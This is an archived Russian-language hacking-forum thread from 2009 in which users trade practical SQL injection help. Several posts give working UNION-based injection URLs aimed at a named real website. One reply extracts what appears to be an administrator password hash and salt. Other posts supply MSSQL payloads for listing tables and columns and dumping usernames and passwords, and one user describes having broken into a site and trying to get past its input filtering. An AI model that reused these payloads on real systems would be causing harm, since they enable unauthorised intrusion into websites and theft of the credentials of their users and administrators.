ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
06.02.2009, 05:03
|
|
Познающий
Регистрация: 21.01.2009
Сообщений: 98
Провел на форуме:
227123
Репутация:
122
|
|
Такой интересный вопросег:
Вот скуль
Код:
http://www.swinguru.co.il/modules.php?op=modload&name=4nAlbum&file=index&do=showgall&gid=-11+union+select+1,2,3,4,5,6,7+--+
version() user() database() не проходит...ну думаю и ладно...наугад проверил..5ая ветка..нашол таблу nuke_users в ней поля username, user_password пытаюсь открыть..ошибка,мысля...табл а не в той базе..нашол базу..
Код:
http://www.swinguru.co.il/modules.php?op=modload&name=4nAlbum&file=index&do=showgall&gid=-11+union+select+1,2,table_schema,4,5,6,7+from+information_schema.%20tables+where+table_name=0x6E756B655F7573657273%20--
edward_swing_s
при запросе
Код:
http://www.swinguru.co.il/modules.php?op=modload&name=4nAlbum&file=index&do=showgall&gid=-11+union+select+1,2,3,4,5,6,7+from+edward_swing_s.nuke_users+--+
тоже ошибка....в чём трабла,мож гдето в синькасисе ошибся...подскажите |
|
|
06.02.2009, 05:35
|
|
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865
Репутация:
571
|
|
Фильтруются скобки..
Код:
http://www.swinguru.co.il/modules.php?op=modload&name=4nAlbum&file=index&do=showgall&gid=-11+union+select+1,2,@@version,4,5,6,7--
Таблица nuke_users - пустая.
Код:
http://www.swinguru.co.il/modules.php?op=modload&name=4nAlbum&file=index&do=showgall&gid=-11+union+select+1,2,table_rows,4,5,6,7+from+information_schema.tables+where+table_name=0x6E756B655F7573657273--
Да и вообще, админские юзеры хранятся тут:
Код:
http://www.swinguru.co.il/modules.php?op=modload&name=4nAlbum&file=index&do=showgall&gid=-11+union+select+1,2,aid,4,5,6,7+from+nuke_authors--
5a4be1fa34e62bb8a6ec6b91d2462f5a:5153
Последний раз редактировалось R1dex; 06.02.2009 в 06:00..
|
|
|
|
06.02.2009, 14:29
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161
Репутация:
142
|
|
Как SIPT-ом слать POST запросы ? Я поменял В поле Request Type GET на POST,и стал слать запросы.В итоге,в логах апача они отображаются:
127.0.0.1 - - [06/Feb/2009:12:26:47 +0200] "POST /'%20%20AND%201=1/* HTTP/1.1" 404 138 "-" "Microsoft URL Control - 6.01.9782"
Отсюда два вариант: Это либо пост,либо кривой гет )) )
|
|
|
|
06.02.2009, 17:13
|
|
Участник форума
Регистрация: 19.02.2008
Сообщений: 186
Провел на форуме:
584540
Репутация:
96
|
|
Приветсвую всех!
Возникли вопросы по MS SQL Injection (в mysql inj вроде более менее понимаю)
Итак, начнем 
1.Нашел я значит ошибку в БД, выдало мне
Microsoft OLE DB Provider for SQL Server error '80040e14'
Unclosed quotation mark before the character string '123' '.
/zope/zope-bd.asp, line 150
Сделал я запрос order+by и насчитал аж 100 колонок
Теперь как же мне посмотреть версию БД, узнать таблицы и посмотреть что в них?
ЧТо то по статьям не могу догнать (прочитал пока только одну, читаю вторую))
Спасибо за ответы заранее, + поставлю обязательно! |
|
|
|
06.02.2009, 17:22
|
|
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме:
2584134
Репутация:
519
|
|
версия - 1 or 1=@@version--
таблици - 1+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_S CHEMA.TABLES)--
колонки - 1+or+1=(SELECT+TOP+1+COLUMN_NAME+FROM+INFORMATION_ SCHEMA.COLUMNS+TABLES+WHERE+TABLE_NAME+NOT+IN+('и мя таблици'))--
Последний раз редактировалось -m0rgan-; 06.02.2009 в 17:26..
|
|
|
|
06.02.2009, 17:46
|
|
Участник форума
Регистрация: 19.02.2008
Сообщений: 186
Провел на форуме:
584540
Репутация:
96
|
|
Сейчас делаю запрос:
example.ru/index.asp?id=1'+union+select+table_name+from+infor mation_schema.tables--
Выдает название первой таблицы, делаю с лимитом:
example.ru/index.asp?id=1'+union+select+table_name+from+infor mation_schema.tables+limit+1,1--
Выдает: Line 1: Incorrect syntax near '1'.
Как победить? |
|
|
|
06.02.2009, 17:50
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
$p01nt
Победить лучше прочтением статьи по MSSQL. Там другой синтаксис. Подойдёт любая, можешь почитать эту :
https://forum.antichat.ru/thread30501.html
|
|
|
|
06.02.2009, 18:00
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161
Репутация:
142
|
|
Люди,вот такая проблема: Проник в систему,нашёл двиг,на котором крутится сайтец.
Вот функция движная,двиг не определил:
Код:
function tep_db_prepare_input($string) {
if (is_string($string)) {
return trim(stripslashes($string));
} elseif (is_array($string)) {
reset($string);
while (list($key, $value) = each($string)) {
$string[$key] = tep_db_prepare_input($value);
}
return $string;
} else {
return $string;
}
}
Она удаляет пробелы и обратные слэши,если это строка,а если это массив,то делает то же самое и для каждого элемента массива.Если это НИ то и НИ другое,то не делает НИЧЕГО,т.е. получается,что фильтрацию мы обошли(и саму функцию частично).Передаю такое:
1+order+by+1 без кавычек.Она мне выдаёт на выходе 2.Почему ? Я так понял,что он определил это как строку,но тогда почему она выполнила такое преобразование ? Пробелов-то нет,и слэшей обратных тем более.Помогите пожалуйста =_=
ЗЫ: Если передать строку в одинарных или в двойных кавычках,то тогда работает третий блок кода,но я сомневаюсь,что сервер позволит мне так играть(из-за magic_quots_gpc.Пока не проверил,но уверен,что включена).
Так... Походу,это osCommerce, Open Source E-Commerce Solutions.Не заметил я что-то )))
http://www.oscommerce.com/
Ухх,убить бы этот сайт нафиг...
Последний раз редактировалось Велемир; 06.02.2009 в 18:09..
|
|
|
|
06.02.2009, 18:03
|
|
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме:
2584134
Репутация:
519
|
|
$p01nt, как сказал jokester, там отличается синтаксис...
Ты заюзал синтаксис mysql, а для MSSQL нужно по другому:
www.site.ru/index.php?id=1'+or+1=(SELECT+TOP+1+TABLE_NAME+FROM +INFORMATION_SCHEMA.TABLES)--
Узнаем название первой таблици...
Для того, чтоб узнать название следующей, нажно составить запрос вида:
www.site.ru/index.php?id=1'+or+1=(SELECT+TOP+1+TABLE_NAME+FROM +IN FORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+(' имя полученой таблици'))--
чтоб следующую :
www.site.ru/index.php?id=1'+or+1=(SELECT+TOP+1+TABLE_NAME+FROM +IN FORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+(' имя первой таблици','имя второй таблици'))--
и так далее...
Аналогично и с колонками.
|
|
|
|
06.02.2009, 18:17
|
|
Участник форума
Регистрация: 19.02.2008
Сообщений: 186
Провел на форуме:
584540
Репутация:
96
|
|
2-m0rgan-, ага, я уже разобрался по статье
Еще раз я, как мне перебрать все данные в колонке если нет поля ID и т.п.
Т.е. есть только поля:
USERNAME,USERPASSWORD
Запрос выглядит след. образом:
1+or+1=(SELECT+TOP+1+USERNAME+from+DD_Users)--
Напоминаю, я говорю про mssql inj |
|
|
|
|
|
|
|
Здесь присутствуют: 4 (пользователей: 0 , гостей: 4)
|
|
|
|
Похожие темы
Линейный вид
